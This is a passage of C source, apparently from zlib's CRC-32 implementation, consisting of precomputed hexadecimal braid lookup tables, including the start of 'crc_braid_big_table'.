{0x00000000, 0xa6770bb4, 0x979f1129, 0x31e81a9d, 0xf44f2413, 0x52382fa7, 0x63d0353a, 0xc5a73e8e, 0x33ef4e67, 0x959845d3, 0xa4705f4e, 0x020754fa, 0xc7a06a74, 0x61d761c0, 0x503f7b5d, 0xf64870e9, 0x67de9cce, 0xc1a9977a, 0xf0418de7, 0x56368653, 0x9391b8dd, 0x35e6b369, 0x040ea9f4, 0xa279a240, 0x5431d2a9, 0xf246d91d, 0xc3aec380, 0x65d9c834, 0xa07ef6ba, 0x0609fd0e, 0x37e1e793, 0x9196ec27, 0xcfbd399c, 0x69ca3228, 0x582228b5, 0xfe552301, 0x3bf21d8f, 0x9d85163b, 0xac6d0ca6, 0x0a1a0712, 0xfc5277fb, 0x5a257c4f, 0x6bcd66d2, 0xcdba6d66, 0x081d53e8, 0xae6a585c, 0x9f8242c1, 0x39f54975, 0xa863a552, 0x0e14aee6, 0x3ffcb47b, 0x998bbfcf, 0x5c2c8141, 0xfa5b8af5, 0xcbb39068, 0x6dc49bdc, 0x9b8ceb35, 0x3dfbe081, 0x0c13fa1c, 0xaa64f1a8, 0x6fc3cf26, 0xc9b4c492, 0xf85cde0f, 0x5e2bd5bb, 0x440b7579, 0xe27c7ecd, 0xd3946450, 0x75e36fe4, 0xb044516a, 0x16335ade, 0x27db4043, 0x81ac4bf7, 0x77e43b1e, 0xd19330aa, 0xe07b2a37, 0x460c2183, 0x83ab1f0d, 0x25dc14b9, 0x14340e24, 0xb2430590, 0x23d5e9b7, 0x85a2e203, 0xb44af89e, 0x123df32a, 0xd79acda4, 0x71edc610, 0x4005dc8d, 0xe672d739, 0x103aa7d0, 0xb64dac64, 0x87a5b6f9, 0x21d2bd4d, 0xe47583c3, 0x42028877, 0x73ea92ea, 0xd59d995e, 0x8bb64ce5, 0x2dc14751, 0x1c295dcc, 0xba5e5678, 0x7ff968f6, 0xd98e6342, 0xe86679df, 0x4e11726b, 0xb8590282, 0x1e2e0936, 0x2fc613ab, 0x89b1181f, 0x4c162691, 0xea612d25, 0xdb8937b8, 0x7dfe3c0c, 0xec68d02b, 0x4a1fdb9f, 0x7bf7c102, 0xdd80cab6, 0x1827f438, 0xbe50ff8c, 0x8fb8e511, 0x29cfeea5, 0xdf879e4c, 0x79f095f8, 0x48188f65, 0xee6f84d1, 0x2bc8ba5f, 0x8dbfb1eb, 0xbc57ab76, 0x1a20a0c2, 0x8816eaf2, 0x2e61e146, 0x1f89fbdb, 0xb9fef06f, 0x7c59cee1, 0xda2ec555, 0xebc6dfc8, 0x4db1d47c, 0xbbf9a495, 0x1d8eaf21, 0x2c66b5bc, 0x8a11be08, 0x4fb68086, 0xe9c18b32, 0xd82991af, 0x7e5e9a1b, 0xefc8763c, 0x49bf7d88, 0x78576715, 0xde206ca1, 0x1b87522f, 0xbdf0599b, 0x8c184306, 0x2a6f48b2, 0xdc27385b, 0x7a5033ef, 0x4bb82972, 0xedcf22c6, 0x28681c48, 0x8e1f17fc, 0xbff70d61, 0x198006d5, 0x47abd36e, 0xe1dcd8da, 0xd034c247, 0x7643c9f3, 0xb3e4f77d, 0x1593fcc9, 0x247be654, 0x820cede0, 0x74449d09, 0xd23396bd, 0xe3db8c20, 0x45ac8794, 0x800bb91a, 0x267cb2ae, 0x1794a833, 0xb1e3a387, 0x20754fa0, 0x86024414, 0xb7ea5e89, 0x119d553d, 0xd43a6bb3, 0x724d6007, 0x43a57a9a, 0xe5d2712e, 0x139a01c7, 0xb5ed0a73, 0x840510ee, 0x22721b5a, 0xe7d525d4, 0x41a22e60, 0x704a34fd, 0xd63d3f49, 0xcc1d9f8b, 0x6a6a943f, 0x5b828ea2, 0xfdf58516, 0x3852bb98, 0x9e25b02c, 0xafcdaab1, 0x09baa105, 0xfff2d1ec, 0x5985da58, 0x686dc0c5, 0xce1acb71, 0x0bbdf5ff, 0xadcafe4b, 0x9c22e4d6, 0x3a55ef62, 0xabc30345, 0x0db408f1, 0x3c5c126c, 0x9a2b19d8, 0x5f8c2756, 0xf9fb2ce2, 0xc813367f, 0x6e643dcb, 0x982c4d22, 0x3e5b4696, 0x0fb35c0b, 0xa9c457bf, 0x6c636931, 0xca146285, 0xfbfc7818, 0x5d8b73ac, 0x03a0a617, 0xa5d7ada3, 0x943fb73e, 0x3248bc8a, 0xf7ef8204, 0x519889b0, 0x6070932d, 0xc6079899, 0x304fe870, 0x9638e3c4, 0xa7d0f959, 0x01a7f2ed, 0xc400cc63, 0x6277c7d7, 0x539fdd4a, 0xf5e8d6fe, 0x647e3ad9, 0xc209316d, 0xf3e12bf0, 0x55962044, 0x90311eca, 0x3646157e, 0x07ae0fe3, 0xa1d90457, 0x579174be, 0xf1e67f0a, 0xc00e6597, 0x66796e23, 0xa3de50ad, 0x05a95b19, 0x34414184, 0x92364a30}, {0x00000000, 0xcb5cd3a5, 0x4dc8a10b, 0x869472ae, 0x9b914216, 0x50cd91b3, 0xd659e31d, 0x1d0530b8, 0xec53826d, 0x270f51c8, 0xa19b2366, 0x6ac7f0c3, 0x77c2c07b, 0xbc9e13de, 0x3a0a6170, 0xf156b2d5, 0x03d6029b, 0xc88ad13e, 0x4e1ea390, 0x85427035, 0x9847408d, 0x531b9328, 0xd58fe186, 0x1ed33223, 0xef8580f6, 0x24d95353, 0xa24d21fd, 0x6911f258, 0x7414c2e0, 0xbf481145, 0x39dc63eb, 0xf280b04e, 0x07ac0536, 0xccf0d693, 0x4a64a43d, 0x81387798, 0x9c3d4720, 0x57619485, 0xd1f5e62b, 0x1aa9358e, 0xebff875b, 0x20a354fe, 0xa6372650, 0x6d6bf5f5, 0x706ec54d, 0xbb3216e8, 0x3da66446, 0xf6fab7e3, 0x047a07ad, 0xcf26d408, 0x49b2a6a6, 0x82ee7503, 0x9feb45bb, 0x54b7961e, 0xd223e4b0, 0x197f3715, 0xe82985c0, 0x23755665, 0xa5e124cb, 0x6ebdf76e, 0x73b8c7d6, 0xb8e41473, 0x3e7066dd, 0xf52cb578, 0x0f580a6c, 0xc404d9c9, 0x4290ab67, 0x89cc78c2, 0x94c9487a, 0x5f959bdf, 0xd901e971, 0x125d3ad4, 0xe30b8801, 0x28575ba4, 0xaec3290a, 0x659ffaaf, 0x789aca17, 0xb3c619b2, 0x35526b1c, 0xfe0eb8b9, 0x0c8e08f7, 0xc7d2db52, 0x4146a9fc, 0x8a1a7a59, 0x971f4ae1, 0x5c439944, 0xdad7ebea, 0x118b384f, 0xe0dd8a9a, 0x2b81593f, 0xad152b91, 0x6649f834, 0x7b4cc88c, 0xb0101b29, 0x36846987, 0xfdd8ba22, 0x08f40f5a, 0xc3a8dcff, 0x453cae51, 0x8e607df4, 0x93654d4c, 0x58399ee9, 0xdeadec47, 0x15f13fe2, 0xe4a78d37, 0x2ffb5e92, 0xa96f2c3c, 0x6233ff99, 0x7f36cf21, 0xb46a1c84, 0x32fe6e2a, 0xf9a2bd8f, 0x0b220dc1, 0xc07ede64, 0x46eaacca, 0x8db67f6f, 0x90b34fd7, 0x5bef9c72, 0xdd7beedc, 0x16273d79, 0xe7718fac, 0x2c2d5c09, 0xaab92ea7, 0x61e5fd02, 0x7ce0cdba, 0xb7bc1e1f, 0x31286cb1, 0xfa74bf14, 0x1eb014d8, 0xd5ecc77d, 0x5378b5d3, 0x98246676, 0x852156ce, 0x4e7d856b, 0xc8e9f7c5, 0x03b52460, 0xf2e396b5, 0x39bf4510, 0xbf2b37be, 0x7477e41b, 0x6972d4a3, 0xa22e0706, 0x24ba75a8, 0xefe6a60d, 0x1d661643, 0xd63ac5e6, 0x50aeb748, 0x9bf264ed, 0x86f75455, 0x4dab87f0, 0xcb3ff55e, 0x006326fb, 0xf135942e, 0x3a69478b, 0xbcfd3525, 0x77a1e680, 0x6aa4d638, 0xa1f8059d, 0x276c7733, 0xec30a496, 0x191c11ee, 0xd240c24b, 0x54d4b0e5, 0x9f886340, 0x828d53f8, 0x49d1805d, 0xcf45f2f3, 0x04192156, 0xf54f9383, 0x3e134026, 0xb8873288, 0x73dbe12d, 0x6eded195, 0xa5820230, 0x2316709e, 0xe84aa33b, 0x1aca1375, 0xd196c0d0, 0x5702b27e, 0x9c5e61db, 0x815b5163, 0x4a0782c6, 0xcc93f068, 0x07cf23cd, 0xf6999118, 0x3dc542bd, 0xbb513013, 0x700de3b6, 0x6d08d30e, 0xa65400ab, 0x20c07205, 0xeb9ca1a0, 0x11e81eb4, 0xdab4cd11, 0x5c20bfbf, 0x977c6c1a, 0x8a795ca2, 0x41258f07, 0xc7b1fda9, 0x0ced2e0c, 0xfdbb9cd9, 0x36e74f7c, 0xb0733dd2, 0x7b2fee77, 0x662adecf, 0xad760d6a, 0x2be27fc4, 0xe0beac61, 0x123e1c2f, 0xd962cf8a, 0x5ff6bd24, 0x94aa6e81, 0x89af5e39, 0x42f38d9c, 0xc467ff32, 0x0f3b2c97, 0xfe6d9e42, 0x35314de7, 0xb3a53f49, 0x78f9ecec, 0x65fcdc54, 0xaea00ff1, 0x28347d5f, 0xe368aefa, 0x16441b82, 0xdd18c827, 0x5b8cba89, 0x90d0692c, 0x8dd55994, 0x46898a31, 0xc01df89f, 0x0b412b3a, 0xfa1799ef, 0x314b4a4a, 0xb7df38e4, 0x7c83eb41, 0x6186dbf9, 0xaada085c, 0x2c4e7af2, 0xe712a957, 0x15921919, 0xdececabc, 0x585ab812, 0x93066bb7, 0x8e035b0f, 0x455f88aa, 0xc3cbfa04, 0x089729a1, 0xf9c19b74, 0x329d48d1, 0xb4093a7f, 0x7f55e9da, 0x6250d962, 0xa90c0ac7, 0x2f987869, 0xe4c4abcc}, {0x00000000, 0x3d6029b0, 0x7ac05360, 0x47a07ad0, 0xf580a6c0, 0xc8e08f70, 0x8f40f5a0, 0xb220dc10, 0x30704bc1, 0x0d106271, 0x4ab018a1, 0x77d03111, 0xc5f0ed01, 0xf890c4b1, 0xbf30be61, 0x825097d1, 0x60e09782, 0x5d80be32, 0x1a20c4e2, 0x2740ed52, 0x95603142, 0xa80018f2, 0xefa06222, 0xd2c04b92, 0x5090dc43, 0x6df0f5f3, 0x2a508f23, 0x1730a693, 0xa5107a83, 0x98705333, 0xdfd029e3, 0xe2b00053, 0xc1c12f04, 0xfca106b4, 0xbb017c64, 0x866155d4, 0x344189c4, 0x0921a074, 0x4e81daa4, 0x73e1f314, 0xf1b164c5, 0xccd14d75, 0x8b7137a5, 0xb6111e15, 0x0431c205, 0x3951ebb5, 0x7ef19165, 0x4391b8d5, 0xa121b886, 0x9c419136, 0xdbe1ebe6, 0xe681c256, 0x54a11e46, 0x69c137f6, 0x2e614d26, 0x13016496, 0x9151f347, 0xac31daf7, 0xeb91a027, 0xd6f18997, 0x64d15587, 0x59b17c37, 0x1e1106e7, 0x23712f57, 0x58f35849, 0x659371f9, 0x22330b29, 0x1f532299, 0xad73fe89, 0x9013d739, 0xd7b3ade9, 0xead38459, 0x68831388, 0x55e33a38, 0x124340e8, 0x2f236958, 0x9d03b548, 0xa0639cf8, 0xe7c3e628, 0xdaa3cf98, 0x3813cfcb, 0x0573e67b, 0x42d39cab, 0x7fb3b51b, 0xcd93690b, 0xf0f340bb, 0xb7533a6b, 0x8a3313db, 0x0863840a, 0x3503adba, 0x72a3d76a, 0x4fc3feda, 0xfde322ca, 0xc0830b7a, 0x872371aa, 0xba43581a, 0x9932774d, 0xa4525efd, 0xe3f2242d, 0xde920d9d, 0x6cb2d18d, 0x51d2f83d, 0x167282ed, 0x2b12ab5d, 0xa9423c8c, 0x9422153c, 0xd3826fec, 0xeee2465c, 0x5cc29a4c, 0x61a2b3fc, 0x2602c92c, 0x1b62e09c, 0xf9d2e0cf, 0xc4b2c97f, 0x8312b3af, 0xbe729a1f, 0x0c52460f, 0x31326fbf, 0x7692156f, 0x4bf23cdf, 0xc9a2ab0e, 0xf4c282be, 0xb362f86e, 0x8e02d1de, 0x3c220dce, 0x0142247e, 0x46e25eae, 0x7b82771e, 0xb1e6b092, 0x8c869922, 0xcb26e3f2, 0xf646ca42, 0x44661652, 0x79063fe2, 0x3ea64532, 0x03c66c82, 0x8196fb53, 0xbcf6d2e3, 0xfb56a833, 0xc6368183, 0x74165d93, 0x49767423, 0x0ed60ef3, 0x33b62743, 0xd1062710, 0xec660ea0, 0xabc67470, 0x96a65dc0, 0x248681d0, 0x19e6a860, 0x5e46d2b0, 0x6326fb00, 0xe1766cd1, 0xdc164561, 0x9bb63fb1, 0xa6d61601, 0x14f6ca11, 0x2996e3a1, 0x6e369971, 0x5356b0c1, 0x70279f96, 0x4d47b626, 0x0ae7ccf6, 0x3787e546, 0x85a73956, 0xb8c710e6, 0xff676a36, 0xc2074386, 0x4057d457, 0x7d37fde7, 0x3a978737, 0x07f7ae87, 0xb5d77297, 0x88b75b27, 0xcf1721f7, 0xf2770847, 0x10c70814, 0x2da721a4, 0x6a075b74, 0x576772c4, 0xe547aed4, 0xd8278764, 0x9f87fdb4, 0xa2e7d404, 0x20b743d5, 0x1dd76a65, 0x5a7710b5, 0x67173905, 0xd537e515, 0xe857cca5, 0xaff7b675, 0x92979fc5, 0xe915e8db, 0xd475c16b, 0x93d5bbbb, 0xaeb5920b, 0x1c954e1b, 0x21f567ab, 0x66551d7b, 0x5b3534cb, 0xd965a31a, 0xe4058aaa, 0xa3a5f07a, 0x9ec5d9ca, 0x2ce505da, 0x11852c6a, 0x562556ba, 0x6b457f0a, 0x89f57f59, 0xb49556e9, 0xf3352c39, 0xce550589, 0x7c75d999, 0x4115f029, 0x06b58af9, 0x3bd5a349, 0xb9853498, 0x84e51d28, 0xc34567f8, 0xfe254e48, 0x4c059258, 0x7165bbe8, 0x36c5c138, 0x0ba5e888, 0x28d4c7df, 0x15b4ee6f, 0x521494bf, 0x6f74bd0f, 0xdd54611f, 0xe03448af, 0xa794327f, 0x9af41bcf, 0x18a48c1e, 0x25c4a5ae, 0x6264df7e, 0x5f04f6ce, 0xed242ade, 0xd044036e, 0x97e479be, 0xaa84500e, 0x4834505d, 0x755479ed, 0x32f4033d, 0x0f942a8d, 0xbdb4f69d, 0x80d4df2d, 0xc774a5fd, 0xfa148c4d, 0x78441b9c, 0x4524322c, 0x028448fc, 0x3fe4614c, 0x8dc4bd5c, 0xb0a494ec, 0xf704ee3c, 0xca64c78c}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0xb029603d, 0x6053c07a, 0xd07aa047, 0xc0a680f5, 0x708fe0c8, 0xa0f5408f, 0x10dc20b2, 0xc14b7030, 0x7162100d, 0xa118b04a, 0x1131d077, 0x01edf0c5, 0xb1c490f8, 0x61be30bf, 0xd1975082, 0x8297e060, 0x32be805d, 0xe2c4201a, 0x52ed4027, 0x42316095, 0xf21800a8, 0x2262a0ef, 0x924bc0d2, 0x43dc9050, 0xf3f5f06d, 0x238f502a, 0x93a63017, 0x837a10a5, 0x33537098, 0xe329d0df, 0x5300b0e2, 0x042fc1c1, 0xb406a1fc, 0x647c01bb, 0xd4556186, 0xc4894134, 0x74a02109, 0xa4da814e, 0x14f3e173, 0xc564b1f1, 0x754dd1cc, 0xa537718b, 0x151e11b6, 0x05c23104, 0xb5eb5139, 0x6591f17e, 0xd5b89143, 0x86b821a1, 0x3691419c, 0xe6ebe1db, 0x56c281e6, 0x461ea154, 0xf637c169, 0x264d612e, 0x96640113, 0x47f35191, 0xf7da31ac, 0x27a091eb, 0x9789f1d6, 0x8755d164, 0x377cb159, 0xe706111e, 0x572f7123, 0x4958f358, 0xf9719365, 0x290b3322, 0x9922531f, 0x89fe73ad, 0x39d71390, 0xe9adb3d7, 0x5984d3ea, 0x88138368, 0x383ae355, 0xe8404312, 0x5869232f, 0x48b5039d, 0xf89c63a0, 0x28e6c3e7, 0x98cfa3da, 0xcbcf1338, 0x7be67305, 0xab9cd342, 0x1bb5b37f, 0x0b6993cd, 0xbb40f3f0, 0x6b3a53b7, 0xdb13338a, 0x0a846308, 0xbaad0335, 0x6ad7a372, 0xdafec34f, 0xca22e3fd, 0x7a0b83c0, 0xaa712387, 0x1a5843ba, 0x4d773299, 0xfd5e52a4, 0x2d24f2e3, 0x9d0d92de, 0x8dd1b26c, 0x3df8d251, 0xed827216, 0x5dab122b, 0x8c3c42a9, 0x3c152294, 0xec6f82d3, 0x5c46e2ee, 0x4c9ac25c, 0xfcb3a261, 0x2cc90226, 0x9ce0621b, 0xcfe0d2f9, 0x7fc9b2c4, 0xafb31283, 0x1f9a72be, 0x0f46520c, 0xbf6f3231, 0x6f159276, 0xdf3cf24b, 0x0eaba2c9, 0xbe82c2f4, 0x6ef862b3, 0xded1028e, 0xce0d223c, 0x7e244201, 0xae5ee246, 0x1e77827b, 0x92b0e6b1, 0x2299868c, 0xf2e326cb, 0x42ca46f6, 0x52166644, 0xe23f0679, 0x3245a63e, 0x826cc603, 0x53fb9681, 0xe3d2f6bc, 0x33a856fb, 0x838136c6, 0x935d1674, 0x23747649, 0xf30ed60e, 0x4327b633, 0x102706d1, 0xa00e66ec, 0x7074c6ab, 0xc05da696, 0xd0818624, 0x60a8e619, 0xb0d2465e, 0x00fb2663, 0xd16c76e1, 0x614516dc, 0xb13fb69b, 0x0116d6a6, 0x11caf614, 0xa1e39629, 0x7199366e, 0xc1b05653, 0x969f2770, 0x26b6474d, 0xf6cce70a, 0x46e58737, 0x5639a785, 0xe610c7b8, 0x366a67ff, 0x864307c2, 0x57d45740, 0xe7fd377d, 0x3787973a, 0x87aef707, 0x9772d7b5, 0x275bb788, 0xf72117cf, 0x470877f2, 0x1408c710, 0xa421a72d, 0x745b076a, 0xc4726757, 0xd4ae47e5, 0x648727d8, 0xb4fd879f, 0x04d4e7a2, 0xd543b720, 0x656ad71d, 0xb510775a, 0x05391767, 0x15e537d5, 0xa5cc57e8, 0x75b6f7af, 0xc59f9792, 0xdbe815e9, 0x6bc175d4, 0xbbbbd593, 0x0b92b5ae, 0x1b4e951c, 0xab67f521, 0x7b1d5566, 0xcb34355b, 0x1aa365d9, 0xaa8a05e4, 0x7af0a5a3, 0xcad9c59e, 0xda05e52c, 0x6a2c8511, 0xba562556, 0x0a7f456b, 0x597ff589, 0xe95695b4, 0x392c35f3, 0x890555ce, 0x99d9757c, 0x29f01541, 0xf98ab506, 0x49a3d53b, 0x983485b9, 0x281de584, 0xf86745c3, 0x484e25fe, 0x5892054c, 0xe8bb6571, 0x38c1c536, 0x88e8a50b, 0xdfc7d428, 0x6feeb415, 0xbf941452, 0x0fbd746f, 0x1f6154dd, 0xaf4834e0, 0x7f3294a7, 0xcf1bf49a, 0x1e8ca418, 0xaea5c425, 0x7edf6462, 0xcef6045f, 0xde2a24ed, 0x6e0344d0, 0xbe79e497, 0x0e5084aa, 0x5d503448, 0xed795475, 0x3d03f432, 0x8d2a940f, 0x9df6b4bd, 0x2ddfd480, 0xfda574c7, 0x4d8c14fa, 0x9c1b4478, 0x2c322445, 0xfc488402, 0x4c61e43f, 0x5cbdc48d, 0xec94a4b0, 0x3cee04f7, 0x8cc764ca}, {0x00000000, 0xa5d35ccb, 0x0ba1c84d, 0xae729486, 0x1642919b, 0xb391cd50, 0x1de359d6, 0xb830051d, 0x6d8253ec, 0xc8510f27, 0x66239ba1, 0xc3f0c76a, 0x7bc0c277, 0xde139ebc, 0x70610a3a, 0xd5b256f1, 0x9b02d603, 0x3ed18ac8, 0x90a31e4e, 0x35704285, 0x8d404798, 0x28931b53, 0x86e18fd5, 0x2332d31e, 0xf68085ef, 0x5353d924, 0xfd214da2, 0x58f21169, 0xe0c21474, 0x451148bf, 0xeb63dc39, 0x4eb080f2, 0x3605ac07, 0x93d6f0cc, 0x3da4644a, 0x98773881, 0x20473d9c, 0x85946157, 0x2be6f5d1, 0x8e35a91a, 0x5b87ffeb, 0xfe54a320, 0x502637a6, 0xf5f56b6d, 0x4dc56e70, 0xe81632bb, 0x4664a63d, 0xe3b7faf6, 0xad077a04, 0x08d426cf, 0xa6a6b249, 0x0375ee82, 0xbb45eb9f, 0x1e96b754, 0xb0e423d2, 0x15377f19, 0xc08529e8, 0x65567523, 0xcb24e1a5, 0x6ef7bd6e, 0xd6c7b873, 0x7314e4b8, 0xdd66703e, 0x78b52cf5, 0x6c0a580f, 0xc9d904c4, 0x67ab9042, 0xc278cc89, 0x7a48c994, 0xdf9b955f, 0x71e901d9, 0xd43a5d12, 0x01880be3, 0xa45b5728, 0x0a29c3ae, 0xaffa9f65, 0x17ca9a78, 0xb219c6b3, 0x1c6b5235, 0xb9b80efe, 0xf7088e0c, 0x52dbd2c7, 0xfca94641, 0x597a1a8a, 0xe14a1f97, 0x4499435c, 0xeaebd7da, 0x4f388b11, 0x9a8adde0, 0x3f59812b, 0x912b15ad, 0x34f84966, 0x8cc84c7b, 0x291b10b0, 0x87698436, 0x22bad8fd, 0x5a0ff408, 0xffdca8c3, 0x51ae3c45, 0xf47d608e, 0x4c4d6593, 0xe99e3958, 0x47ecadde, 0xe23ff115, 0x378da7e4, 0x925efb2f, 0x3c2c6fa9, 0x99ff3362, 0x21cf367f, 0x841c6ab4, 0x2a6efe32, 0x8fbda2f9, 0xc10d220b, 0x64de7ec0, 0xcaacea46, 0x6f7fb68d, 0xd74fb390, 0x729cef5b, 0xdcee7bdd, 0x793d2716, 0xac8f71e7, 0x095c2d2c, 0xa72eb9aa, 0x02fde561, 0xbacde07c, 0x1f1ebcb7, 0xb16c2831, 0x14bf74fa, 0xd814b01e, 0x7dc7ecd5, 0xd3b57853, 0x76662498, 0xce562185, 0x6b857d4e, 0xc5f7e9c8, 0x6024b503, 0xb596e3f2, 0x1045bf39, 0xbe372bbf, 0x1be47774, 0xa3d47269, 0x06072ea2, 0xa875ba24, 0x0da6e6ef, 0x4316661d, 0xe6c53ad6, 0x48b7ae50, 0xed64f29b, 0x5554f786, 0xf087ab4d, 0x5ef53fcb, 0xfb266300, 0x2e9435f1, 0x8b47693a, 0x2535fdbc, 0x80e6a177, 0x38d6a46a, 0x9d05f8a1, 0x33776c27, 0x96a430ec, 0xee111c19, 0x4bc240d2, 0xe5b0d454, 0x4063889f, 0xf8538d82, 0x5d80d149, 0xf3f245cf, 0x56211904, 0x83934ff5, 0x2640133e, 0x883287b8, 0x2de1db73, 0x95d1de6e, 0x300282a5, 0x9e701623, 0x3ba34ae8, 0x7513ca1a, 0xd0c096d1, 0x7eb20257, 0xdb615e9c, 0x63515b81, 0xc682074a, 0x68f093cc, 0xcd23cf07, 0x189199f6, 0xbd42c53d, 0x133051bb, 0xb6e30d70, 0x0ed3086d, 0xab0054a6, 0x0572c020, 0xa0a19ceb, 0xb41ee811, 0x11cdb4da, 0xbfbf205c, 0x1a6c7c97, 0xa25c798a, 0x078f2541, 0xa9fdb1c7, 0x0c2eed0c, 0xd99cbbfd, 0x7c4fe736, 0xd23d73b0, 0x77ee2f7b, 0xcfde2a66, 0x6a0d76ad, 0xc47fe22b, 0x61acbee0, 0x2f1c3e12, 0x8acf62d9, 0x24bdf65f, 0x816eaa94, 0x395eaf89, 0x9c8df342, 0x32ff67c4, 0x972c3b0f, 0x429e6dfe, 0xe74d3135, 0x493fa5b3, 0xececf978, 0x54dcfc65, 0xf10fa0ae, 0x5f7d3428, 0xfaae68e3, 0x821b4416, 0x27c818dd, 0x89ba8c5b, 0x2c69d090, 0x9459d58d, 0x318a8946, 0x9ff81dc0, 0x3a2b410b, 0xef9917fa, 0x4a4a4b31, 0xe438dfb7, 0x41eb837c, 0xf9db8661, 0x5c08daaa, 0xf27a4e2c, 0x57a912e7, 0x19199215, 0xbccacede, 0x12b85a58, 0xb76b0693, 0x0f5b038e, 0xaa885f45, 0x04facbc3, 0xa1299708, 0x749bc1f9, 0xd1489d32, 0x7f3a09b4, 0xdae9557f, 0x62d95062, 0xc70a0ca9, 0x6978982f, 0xccabc4e4}, {0x00000000, 0xb40b77a6, 0x29119f97, 0x9d1ae831, 0x13244ff4, 0xa72f3852, 0x3a35d063, 0x8e3ea7c5, 0x674eef33, 0xd3459895, 0x4e5f70a4, 0xfa540702, 0x746aa0c7, 0xc061d761, 0x5d7b3f50, 0xe97048f6, 0xce9cde67, 0x7a97a9c1, 0xe78d41f0, 0x53863656, 0xddb89193, 0x69b3e635, 0xf4a90e04, 0x40a279a2, 0xa9d23154, 0x1dd946f2, 0x80c3aec3, 0x34c8d965, 0xbaf67ea0, 0x0efd0906, 0x93e7e137, 0x27ec9691, 0x9c39bdcf, 0x2832ca69, 0xb5282258, 0x012355fe, 0x8f1df23b, 0x3b16859d, 0xa60c6dac, 0x12071a0a, 0xfb7752fc, 0x4f7c255a, 0xd266cd6b, 0x666dbacd, 0xe8531d08, 0x5c586aae, 0xc142829f, 0x7549f539, 0x52a563a8, 0xe6ae140e, 0x7bb4fc3f, 0xcfbf8b99, 0x41812c5c, 0xf58a5bfa, 0x6890b3cb, 0xdc9bc46d, 0x35eb8c9b, 0x81e0fb3d, 0x1cfa130c, 0xa8f164aa, 0x26cfc36f, 0x92c4b4c9, 0x0fde5cf8, 0xbbd52b5e, 0x79750b44, 0xcd7e7ce2, 0x506494d3, 0xe46fe375, 0x6a5144b0, 0xde5a3316, 0x4340db27, 0xf74bac81, 0x1e3be477, 0xaa3093d1, 0x372a7be0, 0x83210c46, 0x0d1fab83, 0xb914dc25, 0x240e3414, 0x900543b2, 0xb7e9d523, 0x03e2a285, 0x9ef84ab4, 0x2af33d12, 0xa4cd9ad7, 0x10c6ed71, 0x8ddc0540, 0x39d772e6, 0xd0a73a10, 0x64ac4db6, 0xf9b6a587, 0x4dbdd221, 0xc38375e4, 0x77880242, 0xea92ea73, 0x5e999dd5, 0xe54cb68b, 0x5147c12d, 0xcc5d291c, 0x78565eba, 0xf668f97f, 0x42638ed9, 0xdf7966e8, 0x6b72114e, 0x820259b8, 0x36092e1e, 0xab13c62f, 0x1f18b189, 0x9126164c, 0x252d61ea, 0xb83789db, 0x0c3cfe7d, 0x2bd068ec, 0x9fdb1f4a, 0x02c1f77b, 0xb6ca80dd, 0x38f42718, 0x8cff50be, 0x11e5b88f, 0xa5eecf29, 0x4c9e87df, 0xf895f079, 0x658f1848, 0xd1846fee, 0x5fbac82b, 0xebb1bf8d, 0x76ab57bc, 0xc2a0201a, 0xf2ea1688, 0x46e1612e, 0xdbfb891f, 0x6ff0feb9, 0xe1ce597c, 0x55c52eda, 0xc8dfc6eb, 0x7cd4b14d, 0x95a4f9bb, 0x21af8e1d, 0xbcb5662c, 0x08be118a, 0x8680b64f, 0x328bc1e9, 0xaf9129d8, 0x1b9a5e7e, 0x3c76c8ef, 0x887dbf49, 0x15675778, 0xa16c20de, 0x2f52871b, 0x9b59f0bd, 0x0643188c, 0xb2486f2a, 0x5b3827dc, 0xef33507a, 0x7229b84b, 0xc622cfed, 0x481c6828, 0xfc171f8e, 0x610df7bf, 0xd5068019, 0x6ed3ab47, 0xdad8dce1, 0x47c234d0, 0xf3c94376, 0x7df7e4b3, 0xc9fc9315, 0x54e67b24, 0xe0ed0c82, 0x099d4474, 0xbd9633d2, 0x208cdbe3, 0x9487ac45, 0x1ab90b80, 0xaeb27c26, 0x33a89417, 0x87a3e3b1, 0xa04f7520, 0x14440286, 0x895eeab7, 0x3d559d11, 0xb36b3ad4, 0x07604d72, 0x9a7aa543, 0x2e71d2e5, 0xc7019a13, 0x730aedb5, 0xee100584, 0x5a1b7222, 0xd425d5e7, 0x602ea241, 0xfd344a70, 0x493f3dd6, 0x8b9f1dcc, 0x3f946a6a, 0xa28e825b, 0x1685f5fd, 0x98bb5238, 0x2cb0259e, 0xb1aacdaf, 0x05a1ba09, 0xecd1f2ff, 0x58da8559, 0xc5c06d68, 0x71cb1ace, 0xfff5bd0b, 0x4bfecaad, 0xd6e4229c, 0x62ef553a, 0x4503c3ab, 0xf108b40d, 0x6c125c3c, 0xd8192b9a, 0x56278c5f, 0xe22cfbf9, 0x7f3613c8, 0xcb3d646e, 0x224d2c98, 0x96465b3e, 0x0b5cb30f, 0xbf57c4a9, 0x3169636c, 0x856214ca, 0x1878fcfb, 0xac738b5d, 0x17a6a003, 0xa3add7a5, 0x3eb73f94, 0x8abc4832, 0x0482eff7, 0xb0899851, 0x2d937060, 0x999807c6, 0x70e84f30, 0xc4e33896, 0x59f9d0a7, 0xedf2a701, 0x63cc00c4, 0xd7c77762, 0x4add9f53, 0xfed6e8f5, 0xd93a7e64, 0x6d3109c2, 0xf02be1f3, 0x44209655, 0xca1e3190, 0x7e154636, 0xe30fae07, 0x5704d9a1, 0xbe749157, 0x0a7fe6f1, 0x97650ec0, 0x236e7966, 0xad50dea3, 0x195ba905, 0x84414134, 0x304a3692}, {0x00000000, 0x9e00aacc, 0x7d072542, 0xe3078f8e, 0xfa0e4a84, 0x640ee048, 0x87096fc6, 0x1909c50a, 0xb51be5d3, 0x2b1b4f1f, 0xc81cc091, 0x561c6a5d, 0x4f15af57, 0xd115059b, 0x32128a15, 0xac1220d9, 0x2b31bb7c, 0xb53111b0, 0x56369e3e, 0xc83634f2, 0xd13ff1f8, 0x4f3f5b34, 0xac38d4ba, 0x32387e76, 0x9e2a5eaf, 0x002af463, 0xe32d7bed, 0x7d2dd121, 0x6424142b, 0xfa24bee7, 0x19233169, 0x87239ba5, 0x566276f9, 0xc862dc35, 0x2b6553bb, 0xb565f977, 0xac6c3c7d, 0x326c96b1, 0xd16b193f, 0x4f6bb3f3, 0xe379932a, 0x7d7939e6, 0x9e7eb668, 0x007e1ca4, 0x1977d9ae, 0x87777362, 0x6470fcec, 0xfa705620, 0x7d53cd85, 0xe3536749, 0x0054e8c7, 0x9e54420b, 0x875d8701, 0x195d2dcd, 0xfa5aa243, 0x645a088f, 0xc8482856, 0x5648829a, 0xb54f0d14, 0x2b4fa7d8, 0x324662d2, 0xac46c81e, 0x4f414790, 